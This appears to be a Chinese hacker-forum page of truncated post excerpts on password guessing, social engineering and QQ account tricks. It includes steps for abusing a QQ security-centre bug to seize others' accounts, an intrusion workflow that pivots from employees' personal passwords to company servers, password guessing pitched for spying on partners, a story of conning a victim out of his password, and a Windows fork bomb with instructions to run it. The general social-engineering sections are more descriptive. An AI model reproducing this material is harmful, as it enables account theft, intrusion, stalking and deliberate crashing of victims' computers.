╔───────────────╗
你给我金子
我给你面子
By:豪子
QQ:5646775
╚───────────────╝

猜密码,精准的分析个人密码

人员安全管理一直是企业安全最头疼的问题,尤其近年来大量针对个人攻击的工具越来越多,像社工库、注册网站探测(0xreg.com、reg007.com)、定位探测、企业员工信息聚合系统等等,这是工具在渗透过程中经常用得到。举例一个针对员工个人的攻击流程

其中非常重要的一环是密码环节,如果没有密码,对于后面的收集信息就很麻烦,相反一旦拿到常用密码,就可以登陆个人51job、智联招聘、云笔记、网盘等网站,可以收集到大量信息,甚至公司核心服务器登陆密码和私钥。

这是针对渗透测试来说,针对追女友和查老公老婆信息来说,也可以用同样的方式来获取目标人的密码,但是网上公开的社工库大多数据都比较老,成功登陆率...

企业安全:人员安全管理之黑客怎么入侵员工(1)

 人员安全是目前企业安全最难做的一块,没有之一,这方面没有人写过专业的文章,而目前所有的企业都存在这方面的问题,比如员工把服务器和后台密码直接明文保存在云笔记和网盘中,员工企业邮箱密码跟外部个人密码一致等等,通常我们在入侵的时候只要在微博搜索一个目标公司的员工,拿到常用密码后登陆邮箱,然后在通讯录和邮件中收集其他技术岗位员工的联系方式,最后登录他们的邮箱和云笔记等去翻一些VPN、SVN、SSH等密码,整个过程简单直接有效,而且越大的企业这个问题越严重。

关于人员安全,这次将会更新一个系列的文章,希望本系列的文章能被更多人关注到,所以欢迎转载,为了照顾非技术人员,本系列会不讲的那么技...

无保死保秒上手机教程:

发布秒上手机教程: 注册个新申请的QQ号码 去QQ安全中心

2然后用新申请的QQ登录安全中心

3绑定你的手机号码后 再退出。

4然后再登录你所需要秒手机的QQ号码。


需要注意的

1:八位(死的,无保的)或者八位以上无常用都可以秒上手机,有常用的不仅仅可以秒手机可能还能秒上三问

2:五位六位七位有常用据说可以秒手机,无常用不行。

3:无常用秒完手机的请改密。但是转手卖的话没法卖,因为转不了安全手机。

4:这个BUG可能很快就被封,被封之后很有可能回档,回档变成无保。故死的建 议去秒,无保的没有必要。

5:最悲观的是被回收,所以特别极品

社一个装逼的逗比

QQ:1335752922

原因不是因为他用盗版的秒赞源码,是因为我在他群里,找他要管理,他竟然不给我,所以我就黑了他,一开始只是简单的攻击了他网站,他后面竟然说叫我黑了他网站,你们说,能不能忍?  肯定不能啊,直接上吧。

我就用我小号加了他,问他秒赞网怎么搭建的,能不能教我【求人的语气】

然后他自以为是,我就各种帮他吹嘘,然后我就找他要那个8uftp【装傻装不懂】他说叫我帮他刷一个QQ钻【也许是他看到我钻蛮多的】,我跟他说,刷钻要密码,然后他直接把他密码给我了,然后我一直拖,拖到晚上,先跟她说有事,在跟他说电脑停电,最后说手机刷不了了,在卡盟下单了,卡盟下单他一改密...

QQ群无限设置管理教程

看看我的群。
群管理满了对吧,

打开QQ群聊天窗口,右键设置管理,可以无限设置

OK,就是这样。


QQ连接客服教程

由于骚扰官方客服的太多,TX官方取消了很多对官方客服的接口。

接下来我教大家怎么直接联系官方客服 。

首先,打开kf.qq.com

点击【开通包月服务】


选择右下角的客服
点击【增值】 下面的在线咨询


 点击确定

选择第五个【  5、个人账户/Q币充值  】



然后选择第一个【1、无法充值Q币/未到帐  】

然后选择问题反馈就可以了
然后连接到客服


Q

社会工程学在网络攻击中的应用与防范

社会工程学是信息网络安全中的一个新的分支,其主要特点就是利用人的弱点来进行攻击。 

1.引言


社会工程学(Social Engineering)是把对物的研究方法全盘运用到对人本身的研究上,并将其变成技术控制的工具。社会工程学是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段,取得自身利益的方法。


“社会工程学攻击”就是利用人们的心理特征,骗取用户的信任,获取机密信息、系统设置等不公开资料,为安全攻击和病毒感染创造有利条件。网络安全技术发展到一定程度后,起决定因素的不再是技术问题,而是人和管理。网络安全往往容易被入侵者从内部攻...

社会工程学的4个技巧

社交工程已经成为目前最盛行的攻击方式之一,而且在一些较大的数据泄漏案例中也总是出现。例如,2011年RSA breach就遭遇了定向钓鱼和加载了漏洞的Excel文件。因此,对于有能力模拟真实攻击的企业而言,社工渗透测试应该成为每个渗透测试工具包的强制性策略。 社工行为非常依赖心理学,有很多非常可疑的诱饵,可以让社工人员劝服人们从事某项操作。例如,Robert Cialdini在其著作《影响力:说服心理学》(Influence: The Psychology of Persuasion)中描述了六种刺激人们行为的动机:

1、互惠:因为某人帮助了你而感到歉疚;

2、社交认同:向其他人学习如何进...

广义与狭义的社会工程学

无论在网络上还是在某些资料上,总能看到有人用粗滥的文字和与看法描述社会工程学,他们还洋洋自得的夸耀这是一次成功的“社会工程学”入侵经历。为此,我得为他们纠正,我可不想让这些家伙混淆视听,如果凯文米特尼克听到某人说用搜索引擎搜到一个密码盗取帐号会让他笑掉大牙。


如何区别广义与狭义的社会工程学?可以参考下表,这就可以使你了解到某个伪社会工程学师在玩“一个人的游戏”。


狭义与广义社会工程学最明显的区别是会与受害者进行交换式行为,比如,你会设置一个陷阱使得对方掉入,或是你会伪造一封来自内部的虚假电子邮件,或者你会利用相关通讯工具与他们交流获取敏感信息。


加入在一个获得...

电脑死机代码

将下面5个字符复制到记事本,以bat格式保存,
双击保存好的文件,你的电脑会过不到一分钟(具体死的快慢视机子的配置高低决定,CPU越好 调用自己越快 内存耗尽也越快,而内存越大 则死得越晚)
死机代码:   %0|%0

%0|%0,我来解释一下,%0是个命令行参数,表示命令行中的第一个参数,其实就是要执行的程序本身,同理,%1表示传递给程序的第一个参数,%2,随便举个例子,比如add a b,这里add就是%0,a是%1,b是%2,然后%0|%0的意思还得看|这个符号,|应该是一个管道符号,将前一个命令的输出做为后一个命令的输入,综合上面的...

1     /     6